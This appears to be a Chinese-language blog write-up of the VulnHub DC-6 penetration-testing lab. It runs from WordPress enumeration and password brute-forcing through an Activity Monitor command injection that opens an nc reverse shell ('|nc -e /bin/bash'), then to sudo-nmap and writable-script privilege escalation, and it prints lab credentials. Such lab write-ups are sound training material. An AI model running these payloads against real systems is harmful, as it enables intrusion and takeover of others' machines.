DC-6笔记

靶机信息

今天开DC-6

官方地址:DC: 6 ~ VulnHub

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginners.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

DC-6是另一个专门建立的易受攻击的实验室，旨在获得渗透测试领域的经验。

这不是一个非常困难的挑战，所以对初学者来说应该很好。

这个挑战的最终目标是扎根并读取唯一的标志。

必须具备Linux技能并熟悉Linux命令行，还必须具有使用基本渗透测试工具的经验。

对于初学者来说，谷歌可以提供很大的帮助，但你可以随时在@DCAU7上向我寻求帮助，让你继续学习。但请注意：我不会给你答案，相反，我会给你一个如何前进的想法。

只有一个flag,开干!

信息收集

nmap 192.168.66 2-254

确认IP为192.168.66.143

进一步的勘察

nmap 192.168.66.143 -A -p-

可以看见开放了两端口22和80

http(80)

我们先来看看web服务

额,直接访问有点问题哈,跳转了域名访问

我们需要写hosts文件来绑定域名(同理,kali里也需要修改hosts文件,在/etc目录下)

192.168.66.143 wordy

好了,可以直接用域名访问了

http://wordy/

一进去直接告诉我们用的是WordPress 框架

用插件能探测到具体的版本

先用wpscan扫一下,但是没扫出什么东西,扫了5个用户名

wpscan --url http://wordy/ -e u

然后路径扫描

在readme.html里得到登录页面wp-login.php

我前面忽略了一个作者给的重要的提示,在官网的下面一点

CLUE
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

我们依照提示生成字典

报错了,cd进目录看看

原来还没解压出来

gzip -d rockyou.txt.gz

解压完成后生成字典和之前获取到的用户名一起爆破得到一个账号密码

mark:helpdesk01

ssh登录不上,登录网站后台看看吧

进后台就看见了Activity Monitor插件,它是存在命令执行漏洞的

WordPress Activity Monitor插件远程命令执行漏洞_activity monitor 远程命令执行-CSDN博客

尝试一下还真行

这里输入框只能输入很少的几个字符,我们可以抓包,然后burp里修改

本来想echo写入一句话木马的,可是没成功,应该是权限的问题

然后就尝试nc反弹shell

现在本机接收,然后目标主机命令执行

ncat -lvp 2240

127.0.0.1 |nc -e /bin/bash 192.168.66.1 2240

可以发现shell反弹成功了哈

提权

用python改善shell的环境

python -c 'import pty;pty.spawn("/bin/bash")'

find / -user root -perm -4000 -print 2>/dev/null

没发现什么有利用价值的

还是去翻翻home目录

在mark的目录里发现了宝贝

graham:GSo7isUM1D4

疑似一个新的用户哈,直接切换过去试试

sudo -l

里面发现了提示

切换到jens的目录里看见观察backups.sh的权限

可以看见这个脚本的所有者和所属组是具有读写和执行权限的,我们再看看graham即当前登录用户的所属组

可以看见是在devs组里的,那么我们如果修改脚本并执行就可以得到jens用户的shell

以jens用户的身份执行backups.sh

使用sudo -l又发现提示用nmap提权

百度上学习了一番,当用户具有nmap的root的权限的时候,可以这样得到root权限

touch root_shell.sh
echo 'os.execute("/bin/sh")' > root_shell.sh
sudo nmap --script=root_shell.sh

flag

小结

第二次在DC系列里碰见WordPress了,而且两次都用到了暴力破解用户名密码

这次还学到了用nmap提权